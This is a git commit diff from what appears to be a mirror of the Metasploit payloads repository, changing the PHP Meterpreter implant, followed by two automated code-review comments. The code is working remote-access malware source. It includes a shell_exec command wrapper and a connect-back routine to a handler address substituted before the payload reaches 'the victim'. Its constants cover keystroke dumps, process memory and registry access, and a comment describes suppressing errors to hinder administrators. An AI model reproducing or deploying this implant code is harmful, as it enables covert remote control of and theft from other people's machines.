mirror of
https://github.com/rapid7/metasploit-payloads
synced 2024-11-20 14:39:22 +01:00
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone
git-svn-id: file:///home/svn/framework3/trunk@9939 4d416f70-5f16-0410-b530-b9f4589650da
parent
3abe2d478d
commit
89b385521b
@ -3,6 +3,146 @@
|
||||
# STDAPI
|
||||
##
|
||||
|
||||
##
|
||||
# General
|
||||
##
|
||||
define("TLV_TYPE_HANDLE", TLV_META_TYPE_UINT | 600);
|
||||
define("TLV_TYPE_INHERIT", TLV_META_TYPE_BOOL | 601);
|
||||
define("TLV_TYPE_PROCESS_HANDLE", TLV_META_TYPE_UINT | 630);
|
||||
define("TLV_TYPE_THREAD_HANDLE", TLV_META_TYPE_UINT | 631);
|
||||
|
||||
##
|
||||
# Fs
|
||||
##
|
||||
define("TLV_TYPE_DIRECTORY_PATH", TLV_META_TYPE_STRING | 1200);
|
||||
define("TLV_TYPE_FILE_NAME", TLV_META_TYPE_STRING | 1201);
|
||||
define("TLV_TYPE_FILE_PATH", TLV_META_TYPE_STRING | 1202);
|
||||
define("TLV_TYPE_FILE_MODE", TLV_META_TYPE_STRING | 1203);
|
||||
define("TLV_TYPE_STAT_BUF", TLV_META_TYPE_COMPLEX | 1220);
|
||||
|
||||
##
|
||||
# Net
|
||||
##
|
||||
define("TLV_TYPE_HOST_NAME", TLV_META_TYPE_STRING | 1400);
|
||||
define("TLV_TYPE_PORT", TLV_META_TYPE_UINT | 1401);
|
||||
|
||||
define("TLV_TYPE_SUBNET", TLV_META_TYPE_RAW | 1420);
|
||||
define("TLV_TYPE_NETMASK", TLV_META_TYPE_RAW | 1421);
|
||||
define("TLV_TYPE_GATEWAY", TLV_META_TYPE_RAW | 1422);
|
||||
define("TLV_TYPE_NETWORK_ROUTE", TLV_META_TYPE_GROUP | 1423);
|
||||
|
||||
define("TLV_TYPE_IP", TLV_META_TYPE_RAW | 1430);
|
||||
define("TLV_TYPE_MAC_ADDRESS", TLV_META_TYPE_RAW | 1431);
|
||||
define("TLV_TYPE_MAC_NAME", TLV_META_TYPE_STRING | 1432);
|
||||
define("TLV_TYPE_NETWORK_INTERFACE", TLV_META_TYPE_GROUP | 1433);
|
||||
|
||||
define("TLV_TYPE_SUBNET_STRING", TLV_META_TYPE_STRING | 1440);
|
||||
define("TLV_TYPE_NETMASK_STRING", TLV_META_TYPE_STRING | 1441);
|
||||
define("TLV_TYPE_GATEWAY_STRING", TLV_META_TYPE_STRING | 1442);
|
||||
|
||||
# Socket
|
||||
define("TLV_TYPE_PEER_HOST", TLV_META_TYPE_STRING | 1500);
|
||||
define("TLV_TYPE_PEER_PORT", TLV_META_TYPE_UINT | 1501);
|
||||
define("TLV_TYPE_LOCAL_HOST", TLV_META_TYPE_STRING | 1502);
|
||||
define("TLV_TYPE_LOCAL_PORT", TLV_META_TYPE_UINT | 1503);
|
||||
define("TLV_TYPE_CONNECT_RETRIES", TLV_META_TYPE_UINT | 1504);
|
||||
|
||||
define("TLV_TYPE_SHUTDOWN_HOW", TLV_META_TYPE_UINT | 1530);
|
||||
|
||||
##
|
||||
# Sys
|
||||
##
|
||||
define("PROCESS_EXECUTE_FLAG_HIDDEN", (1 << 0));
|
||||
define("PROCESS_EXECUTE_FLAG_CHANNELIZED", (1 << 1));
|
||||
define("PROCESS_EXECUTE_FLAG_SUSPENDED", (1 << 2));
|
||||
define("PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN", (1 << 3));
|
||||
|
||||
# Registry
|
||||
define("TLV_TYPE_HKEY", TLV_META_TYPE_UINT | 1000);
|
||||
define("TLV_TYPE_ROOT_KEY", TLV_TYPE_HKEY);
|
||||
define("TLV_TYPE_BASE_KEY", TLV_META_TYPE_STRING | 1001);
|
||||
define("TLV_TYPE_PERMISSION", TLV_META_TYPE_UINT | 1002);
|
||||
define("TLV_TYPE_KEY_NAME", TLV_META_TYPE_STRING | 1003);
|
||||
define("TLV_TYPE_VALUE_NAME", TLV_META_TYPE_STRING | 1010);
|
||||
define("TLV_TYPE_VALUE_TYPE", TLV_META_TYPE_UINT | 1011);
|
||||
define("TLV_TYPE_VALUE_DATA", TLV_META_TYPE_RAW | 1012);
|
||||
|
||||
# Config
|
||||
define("TLV_TYPE_COMPUTER_NAME", TLV_META_TYPE_STRING | 1040);
|
||||
define("TLV_TYPE_OS_NAME", TLV_META_TYPE_STRING | 1041);
|
||||
define("TLV_TYPE_USER_NAME", TLV_META_TYPE_STRING | 1042);
|
||||
|
||||
define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
|
||||
|
||||
# Process
|
||||
define("TLV_TYPE_BASE_ADDRESS", TLV_META_TYPE_UINT | 2000);
|
||||
define("TLV_TYPE_ALLOCATION_TYPE", TLV_META_TYPE_UINT | 2001);
|
||||
define("TLV_TYPE_PROTECTION", TLV_META_TYPE_UINT | 2002);
|
||||
define("TLV_TYPE_PROCESS_PERMS", TLV_META_TYPE_UINT | 2003);
|
||||
define("TLV_TYPE_PROCESS_MEMORY", TLV_META_TYPE_RAW | 2004);
|
||||
define("TLV_TYPE_ALLOC_BASE_ADDRESS", TLV_META_TYPE_UINT | 2005);
|
||||
define("TLV_TYPE_MEMORY_STATE", TLV_META_TYPE_UINT | 2006);
|
||||
define("TLV_TYPE_MEMORY_TYPE", TLV_META_TYPE_UINT | 2007);
|
||||
define("TLV_TYPE_ALLOC_PROTECTION", TLV_META_TYPE_UINT | 2008);
|
||||
define("TLV_TYPE_PID", TLV_META_TYPE_UINT | 2300);
|
||||
define("TLV_TYPE_PROCESS_NAME", TLV_META_TYPE_STRING | 2301);
|
||||
define("TLV_TYPE_PROCESS_PATH", TLV_META_TYPE_STRING | 2302);
|
||||
define("TLV_TYPE_PROCESS_GROUP", TLV_META_TYPE_GROUP | 2303);
|
||||
define("TLV_TYPE_PROCESS_FLAGS", TLV_META_TYPE_UINT | 2304);
|
||||
define("TLV_TYPE_PROCESS_ARGUMENTS", TLV_META_TYPE_STRING | 2305);
|
||||
|
||||
define("TLV_TYPE_IMAGE_FILE", TLV_META_TYPE_STRING | 2400);
|
||||
define("TLV_TYPE_IMAGE_FILE_PATH", TLV_META_TYPE_STRING | 2401);
|
||||
define("TLV_TYPE_PROCEDURE_NAME", TLV_META_TYPE_STRING | 2402);
|
||||
define("TLV_TYPE_PROCEDURE_ADDRESS", TLV_META_TYPE_UINT | 2403);
|
||||
define("TLV_TYPE_IMAGE_BASE", TLV_META_TYPE_UINT | 2404);
|
||||
define("TLV_TYPE_IMAGE_GROUP", TLV_META_TYPE_GROUP | 2405);
|
||||
define("TLV_TYPE_IMAGE_NAME", TLV_META_TYPE_STRING | 2406);
|
||||
|
||||
define("TLV_TYPE_THREAD_ID", TLV_META_TYPE_UINT | 2500);
|
||||
define("TLV_TYPE_THREAD_PERMS", TLV_META_TYPE_UINT | 2502);
|
||||
define("TLV_TYPE_EXIT_CODE", TLV_META_TYPE_UINT | 2510);
|
||||
define("TLV_TYPE_ENTRY_POINT", TLV_META_TYPE_UINT | 2511);
|
||||
define("TLV_TYPE_ENTRY_PARAMETER", TLV_META_TYPE_UINT | 2512);
|
||||
define("TLV_TYPE_CREATION_FLAGS", TLV_META_TYPE_UINT | 2513);
|
||||
|
||||
define("TLV_TYPE_REGISTER_NAME", TLV_META_TYPE_STRING | 2540);
|
||||
define("TLV_TYPE_REGISTER_SIZE", TLV_META_TYPE_UINT | 2541);
|
||||
define("TLV_TYPE_REGISTER_VALUE_32", TLV_META_TYPE_UINT | 2542);
|
||||
define("TLV_TYPE_REGISTER", TLV_META_TYPE_GROUP | 2550);
|
||||
|
||||
##
|
||||
# Ui
|
||||
##
|
||||
define("TLV_TYPE_IDLE_TIME", TLV_META_TYPE_UINT | 3000);
|
||||
define("TLV_TYPE_KEYS_DUMP", TLV_META_TYPE_STRING | 3001);
|
||||
define("TLV_TYPE_DESKTOP", TLV_META_TYPE_STRING | 3002);
|
||||
|
||||
##
|
||||
# Event Log
|
||||
##
|
||||
define("TLV_TYPE_EVENT_SOURCENAME", TLV_META_TYPE_STRING | 4000);
|
||||
define("TLV_TYPE_EVENT_HANDLE", TLV_META_TYPE_UINT | 4001);
|
||||
define("TLV_TYPE_EVENT_NUMRECORDS", TLV_META_TYPE_UINT | 4002);
|
||||
|
||||
define("TLV_TYPE_EVENT_READFLAGS", TLV_META_TYPE_UINT | 4003);
|
||||
define("TLV_TYPE_EVENT_RECORDOFFSET", TLV_META_TYPE_UINT | 4004);
|
||||
|
||||
define("TLV_TYPE_EVENT_RECORDNUMBER", TLV_META_TYPE_UINT | 4006);
|
||||
define("TLV_TYPE_EVENT_TIMEGENERATED", TLV_META_TYPE_UINT | 4007);
|
||||
define("TLV_TYPE_EVENT_TIMEWRITTEN", TLV_META_TYPE_UINT | 4008);
|
||||
define("TLV_TYPE_EVENT_ID", TLV_META_TYPE_UINT | 4009);
|
||||
define("TLV_TYPE_EVENT_TYPE", TLV_META_TYPE_UINT | 4010);
|
||||
define("TLV_TYPE_EVENT_CATEGORY", TLV_META_TYPE_UINT | 4011);
|
||||
define("TLV_TYPE_EVENT_STRING", TLV_META_TYPE_STRING | 4012);
|
||||
define("TLV_TYPE_EVENT_DATA", TLV_META_TYPE_RAW | 4013);
|
||||
|
||||
##
|
||||
# Power
|
||||
##
|
||||
define("TLV_TYPE_POWER_FLAGS", TLV_META_TYPE_UINT | 4100);
|
||||
define("TLV_TYPE_POWER_REASON", TLV_META_TYPE_UINT | 4101);
|
||||
|
||||
# Wrap everything in checks for existence of the new functions in case we get
|
||||
# eval'd twice
|
||||
my_print("Evaling stdapi");
|
||||
|
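Review bot: The `define()` calls added at the top of this hunk run unconditionally, although the comment at the end of the same hunk says the extension has to tolerate being eval'd twice. A second evaluation would re-run every `define()`, and PHP reports each one as an already-defined constant. Wrapping the constants in a single guard such as `if (!defined("TLV_TYPE_HANDLE")) { ... }` would make them consistent with the function-existence checks that comment refers to, which are not visible in this hunk. The block also relies on the `TLV_META_TYPE_*` constants, which the hunk does not define, so a comment like `# Requires the TLV_META_TYPE_* constants from the main stage` above the first `define()` would help.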
@ -1,5 +1,8 @@
|
||||
#<?php
|
||||
|
||||
# Everything that needs to be global has to be made so explicitly so we can run
|
||||
# inside a call to create_user_func($user_input);
|
||||
|
||||
# global list of channels
|
||||
if (!isset($GLOBALS['channels'])) {
|
||||
$GLOBALS['channels'] = array();
|
||||
@ -22,7 +25,7 @@ if (!isset($GLOBALS['readers'])) {
|
||||
}
|
||||
|
||||
function my_print($str) {
|
||||
#error_log($str);
|
||||
error_log($str);
|
||||
}
|
||||
|
||||
my_print("Evaling main meterpreter stage");
|
||||
@ -37,8 +40,7 @@ function dump_array($arr, $name=null) {
|
||||
my_print(sprintf("$name (%s)", count($arr)));
|
||||
}
|
||||
foreach ($arr as $key => $val) {
|
||||
$foo = sprintf(" $key ($val)");
|
||||
my_print($foo);
|
||||
my_print(sprintf(" $key ($val)"));
|
||||
}
|
||||
}
|
||||
function dump_readers() {
|
||||
@ -149,146 +151,6 @@ define("TLV_TYPE_MIGRATE_LEN", TLV_META_TYPE_UINT | 403);
|
||||
define("TLV_TYPE_CIPHER_NAME", TLV_META_TYPE_STRING | 500);
|
||||
define("TLV_TYPE_CIPHER_PARAMETERS", TLV_META_TYPE_GROUP | 501);
|
||||
|
||||
##
|
||||
# General
|
||||
##
|
||||
define("TLV_TYPE_HANDLE", TLV_META_TYPE_UINT | 600);
|
||||
define("TLV_TYPE_INHERIT", TLV_META_TYPE_BOOL | 601);
|
||||
define("TLV_TYPE_PROCESS_HANDLE", TLV_META_TYPE_UINT | 630);
|
||||
define("TLV_TYPE_THREAD_HANDLE", TLV_META_TYPE_UINT | 631);
|
||||
|
||||
##
|
||||
# Fs
|
||||
##
|
||||
define("TLV_TYPE_DIRECTORY_PATH", TLV_META_TYPE_STRING | 1200);
|
||||
define("TLV_TYPE_FILE_NAME", TLV_META_TYPE_STRING | 1201);
|
||||
define("TLV_TYPE_FILE_PATH", TLV_META_TYPE_STRING | 1202);
|
||||
define("TLV_TYPE_FILE_MODE", TLV_META_TYPE_STRING | 1203);
|
||||
define("TLV_TYPE_STAT_BUF", TLV_META_TYPE_COMPLEX | 1220);
|
||||
|
||||
##
|
||||
# Net
|
||||
##
|
||||
define("TLV_TYPE_HOST_NAME", TLV_META_TYPE_STRING | 1400);
|
||||
define("TLV_TYPE_PORT", TLV_META_TYPE_UINT | 1401);
|
||||
|
||||
define("TLV_TYPE_SUBNET", TLV_META_TYPE_RAW | 1420);
|
||||
define("TLV_TYPE_NETMASK", TLV_META_TYPE_RAW | 1421);
|
||||
define("TLV_TYPE_GATEWAY", TLV_META_TYPE_RAW | 1422);
|
||||
define("TLV_TYPE_NETWORK_ROUTE", TLV_META_TYPE_GROUP | 1423);
|
||||
|
||||
define("TLV_TYPE_IP", TLV_META_TYPE_RAW | 1430);
|
||||
define("TLV_TYPE_MAC_ADDRESS", TLV_META_TYPE_RAW | 1431);
|
||||
define("TLV_TYPE_MAC_NAME", TLV_META_TYPE_STRING | 1432);
|
||||
define("TLV_TYPE_NETWORK_INTERFACE", TLV_META_TYPE_GROUP | 1433);
|
||||
|
||||
define("TLV_TYPE_SUBNET_STRING", TLV_META_TYPE_STRING | 1440);
|
||||
define("TLV_TYPE_NETMASK_STRING", TLV_META_TYPE_STRING | 1441);
|
||||
define("TLV_TYPE_GATEWAY_STRING", TLV_META_TYPE_STRING | 1442);
|
||||
|
||||
# Socket
|
||||
define("TLV_TYPE_PEER_HOST", TLV_META_TYPE_STRING | 1500);
|
||||
define("TLV_TYPE_PEER_PORT", TLV_META_TYPE_UINT | 1501);
|
||||
define("TLV_TYPE_LOCAL_HOST", TLV_META_TYPE_STRING | 1502);
|
||||
define("TLV_TYPE_LOCAL_PORT", TLV_META_TYPE_UINT | 1503);
|
||||
define("TLV_TYPE_CONNECT_RETRIES", TLV_META_TYPE_UINT | 1504);
|
||||
|
||||
define("TLV_TYPE_SHUTDOWN_HOW", TLV_META_TYPE_UINT | 1530);
|
||||
|
||||
##
|
||||
# Sys
|
||||
##
|
||||
define("PROCESS_EXECUTE_FLAG_HIDDEN", (1 << 0));
|
||||
define("PROCESS_EXECUTE_FLAG_CHANNELIZED", (1 << 1));
|
||||
define("PROCESS_EXECUTE_FLAG_SUSPENDED", (1 << 2));
|
||||
define("PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN", (1 << 3));
|
||||
|
||||
# Registry
|
||||
define("TLV_TYPE_HKEY", TLV_META_TYPE_UINT | 1000);
|
||||
define("TLV_TYPE_ROOT_KEY", TLV_TYPE_HKEY);
|
||||
define("TLV_TYPE_BASE_KEY", TLV_META_TYPE_STRING | 1001);
|
||||
define("TLV_TYPE_PERMISSION", TLV_META_TYPE_UINT | 1002);
|
||||
define("TLV_TYPE_KEY_NAME", TLV_META_TYPE_STRING | 1003);
|
||||
define("TLV_TYPE_VALUE_NAME", TLV_META_TYPE_STRING | 1010);
|
||||
define("TLV_TYPE_VALUE_TYPE", TLV_META_TYPE_UINT | 1011);
|
||||
define("TLV_TYPE_VALUE_DATA", TLV_META_TYPE_RAW | 1012);
|
||||
|
||||
# Config
|
||||
define("TLV_TYPE_COMPUTER_NAME", TLV_META_TYPE_STRING | 1040);
|
||||
define("TLV_TYPE_OS_NAME", TLV_META_TYPE_STRING | 1041);
|
||||
define("TLV_TYPE_USER_NAME", TLV_META_TYPE_STRING | 1042);
|
||||
|
||||
define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
|
||||
|
||||
# Process
|
||||
define("TLV_TYPE_BASE_ADDRESS", TLV_META_TYPE_UINT | 2000);
|
||||
define("TLV_TYPE_ALLOCATION_TYPE", TLV_META_TYPE_UINT | 2001);
|
||||
define("TLV_TYPE_PROTECTION", TLV_META_TYPE_UINT | 2002);
|
||||
define("TLV_TYPE_PROCESS_PERMS", TLV_META_TYPE_UINT | 2003);
|
||||
define("TLV_TYPE_PROCESS_MEMORY", TLV_META_TYPE_RAW | 2004);
|
||||
define("TLV_TYPE_ALLOC_BASE_ADDRESS", TLV_META_TYPE_UINT | 2005);
|
||||
define("TLV_TYPE_MEMORY_STATE", TLV_META_TYPE_UINT | 2006);
|
||||
define("TLV_TYPE_MEMORY_TYPE", TLV_META_TYPE_UINT | 2007);
|
||||
define("TLV_TYPE_ALLOC_PROTECTION", TLV_META_TYPE_UINT | 2008);
|
||||
define("TLV_TYPE_PID", TLV_META_TYPE_UINT | 2300);
|
||||
define("TLV_TYPE_PROCESS_NAME", TLV_META_TYPE_STRING | 2301);
|
||||
define("TLV_TYPE_PROCESS_PATH", TLV_META_TYPE_STRING | 2302);
|
||||
define("TLV_TYPE_PROCESS_GROUP", TLV_META_TYPE_GROUP | 2303);
|
||||
define("TLV_TYPE_PROCESS_FLAGS", TLV_META_TYPE_UINT | 2304);
|
||||
define("TLV_TYPE_PROCESS_ARGUMENTS", TLV_META_TYPE_STRING | 2305);
|
||||
|
||||
define("TLV_TYPE_IMAGE_FILE", TLV_META_TYPE_STRING | 2400);
|
||||
define("TLV_TYPE_IMAGE_FILE_PATH", TLV_META_TYPE_STRING | 2401);
|
||||
define("TLV_TYPE_PROCEDURE_NAME", TLV_META_TYPE_STRING | 2402);
|
||||
define("TLV_TYPE_PROCEDURE_ADDRESS", TLV_META_TYPE_UINT | 2403);
|
||||
define("TLV_TYPE_IMAGE_BASE", TLV_META_TYPE_UINT | 2404);
|
||||
define("TLV_TYPE_IMAGE_GROUP", TLV_META_TYPE_GROUP | 2405);
|
||||
define("TLV_TYPE_IMAGE_NAME", TLV_META_TYPE_STRING | 2406);
|
||||
|
||||
define("TLV_TYPE_THREAD_ID", TLV_META_TYPE_UINT | 2500);
|
||||
define("TLV_TYPE_THREAD_PERMS", TLV_META_TYPE_UINT | 2502);
|
||||
define("TLV_TYPE_EXIT_CODE", TLV_META_TYPE_UINT | 2510);
|
||||
define("TLV_TYPE_ENTRY_POINT", TLV_META_TYPE_UINT | 2511);
|
||||
define("TLV_TYPE_ENTRY_PARAMETER", TLV_META_TYPE_UINT | 2512);
|
||||
define("TLV_TYPE_CREATION_FLAGS", TLV_META_TYPE_UINT | 2513);
|
||||
|
||||
define("TLV_TYPE_REGISTER_NAME", TLV_META_TYPE_STRING | 2540);
|
||||
define("TLV_TYPE_REGISTER_SIZE", TLV_META_TYPE_UINT | 2541);
|
||||
define("TLV_TYPE_REGISTER_VALUE_32", TLV_META_TYPE_UINT | 2542);
|
||||
define("TLV_TYPE_REGISTER", TLV_META_TYPE_GROUP | 2550);
|
||||
|
||||
##
|
||||
# Ui
|
||||
##
|
||||
define("TLV_TYPE_IDLE_TIME", TLV_META_TYPE_UINT | 3000);
|
||||
define("TLV_TYPE_KEYS_DUMP", TLV_META_TYPE_STRING | 3001);
|
||||
define("TLV_TYPE_DESKTOP", TLV_META_TYPE_STRING | 3002);
|
||||
|
||||
##
|
||||
# Event Log
|
||||
##
|
||||
define("TLV_TYPE_EVENT_SOURCENAME", TLV_META_TYPE_STRING | 4000);
|
||||
define("TLV_TYPE_EVENT_HANDLE", TLV_META_TYPE_UINT | 4001);
|
||||
define("TLV_TYPE_EVENT_NUMRECORDS", TLV_META_TYPE_UINT | 4002);
|
||||
|
||||
define("TLV_TYPE_EVENT_READFLAGS", TLV_META_TYPE_UINT | 4003);
|
||||
define("TLV_TYPE_EVENT_RECORDOFFSET", TLV_META_TYPE_UINT | 4004);
|
||||
|
||||
define("TLV_TYPE_EVENT_RECORDNUMBER", TLV_META_TYPE_UINT | 4006);
|
||||
define("TLV_TYPE_EVENT_TIMEGENERATED", TLV_META_TYPE_UINT | 4007);
|
||||
define("TLV_TYPE_EVENT_TIMEWRITTEN", TLV_META_TYPE_UINT | 4008);
|
||||
define("TLV_TYPE_EVENT_ID", TLV_META_TYPE_UINT | 4009);
|
||||
define("TLV_TYPE_EVENT_TYPE", TLV_META_TYPE_UINT | 4010);
|
||||
define("TLV_TYPE_EVENT_CATEGORY", TLV_META_TYPE_UINT | 4011);
|
||||
define("TLV_TYPE_EVENT_STRING", TLV_META_TYPE_STRING | 4012);
|
||||
define("TLV_TYPE_EVENT_DATA", TLV_META_TYPE_RAW | 4013);
|
||||
|
||||
##
|
||||
# Power
|
||||
##
|
||||
define("TLV_TYPE_POWER_FLAGS", TLV_META_TYPE_UINT | 4100);
|
||||
define("TLV_TYPE_POWER_REASON", TLV_META_TYPE_UINT | 4101);
|
||||
|
||||
function my_cmd($cmd) {
|
||||
return shell_exec($cmd);
|
||||
}
|
||||
@ -299,9 +161,6 @@ function is_windows() {
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
##
|
||||
# Worker functions
|
||||
##
|
||||
@ -711,13 +570,16 @@ function connect($ipaddr, $port, $proto='tcp') {
|
||||
# Prefer the stream versions so we don't have to use both select functions
|
||||
# unnecessarily, but fall back to socket_create if they aren't available.
|
||||
if (is_callable('stream_socket_client')) {
|
||||
my_print("stream_socket_client");
|
||||
my_print("stream_socket_client({$proto}://{$ipaddr}:{$port})");
|
||||
$sock = stream_socket_client("{$proto}://{$ipaddr}:{$port}");
|
||||
my_print("Got a sock: $sock");
|
||||
if (!$sock) { return false; }
|
||||
if ($proto == 'tcp') {
|
||||
register_stream($sock);
|
||||
} elseif ($proto == 'udp') {
|
||||
register_stream($sock, $ipaddr, $port);
|
||||
} else {
|
||||
my_print("WTF proto is this: '$proto'");
|
||||
}
|
||||
} else
|
||||
if (is_callable('fsockopen')) {
|
||||
@ -935,7 +797,7 @@ ob_implicit_flush();
|
||||
# Turn off error reporting so we don't leave any ugly logs. Why make an
|
||||
# administrator's job easier if we don't have to? =)
|
||||
error_reporting(0);
|
||||
#error_reporting(E_ALL);
|
||||
error_reporting(E_ALL);
|
||||
|
||||
@ignore_user_abort(true);
|
||||
# Has no effect in safe mode, but try anyway
|
||||
@ -944,11 +806,12 @@ error_reporting(0);
|
||||
|
||||
# If we don't have a socket we're standalone, setup the connection here.
|
||||
# Otherwise, this is a staged payload, don't bother connecting
|
||||
if (!isset($msgsock)) {
|
||||
if (!isset($GLOBALS['msgsock'])) {
|
||||
# The payload handler overwrites this with the correct LHOST before sending
|
||||
# it to the victim.
|
||||
$ipaddr = '127.0.0.1';
|
||||
$port = 4444;
|
||||
my_print("Don't have a msgsock, trying to connect($ipaddr, $port)");
|
||||
if (FALSE !== strpos($ipaddr,":")) {
|
||||
# ipv6 requires brackets around the address
|
||||
$ipaddr = "[".$ipaddr."]";
|
||||
@ -956,6 +819,10 @@ if (!isset($msgsock)) {
|
||||
$msgsock = connect($ipaddr, $port);
|
||||
if (!$msgsock) { die(); }
|
||||
} else {
|
||||
# The ABI for PHP stagers is a socket in $msgsock and it's type (socket or
|
||||
# stream) in $msgsock_type
|
||||
$msgsock = $GLOBALS['msgsock'];
|
||||
$msgsock_type = $GLOBALS['msgsock_type'];
|
||||
switch ($msgsock_type) {
|
||||
case 'socket':
|
||||
register_socket($msgsock);
|
||||
@ -973,7 +840,7 @@ add_reader($msgsock);
|
||||
#
|
||||
$r=$GLOBALS['readers'];
|
||||
while (false !== ($cnt = select($r, $w=null, $e=null, 1))) {
|
||||
#my_print(sprintf("Returned from select with %s readers", count($r)));
|
||||
my_print(sprintf("Returned from select with %s readers", count($r)));
|
||||
$read_failed = false;
|
||||
for ($i = 0; $i < $cnt; $i++) {
|
||||
$ready = $r[$i];
|
||||
|
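Review bot: In `dump_array` the new line `my_print(sprintf(" $key ($val)"));` still passes the interpolated key and value to sprintf as the format string, so a `%` in the array data is parsed as a conversion with no matching argument and the line is lost or raises an error. Either `my_print(" $key ($val)");` or `my_print(sprintf(" %s (%s)", $key, $val));` avoids that. The start of dump_array is outside the hunk, so whether `$val` can itself be an array cannot be checked from here. Separately, this commit also enables `error_log($str)` in my_print and `error_reporting(E_ALL)`, which the commit message does not mention and which leaves the "Turn off error reporting" comment contradicting the line below it; update that comment or move the debug changes into their own commit.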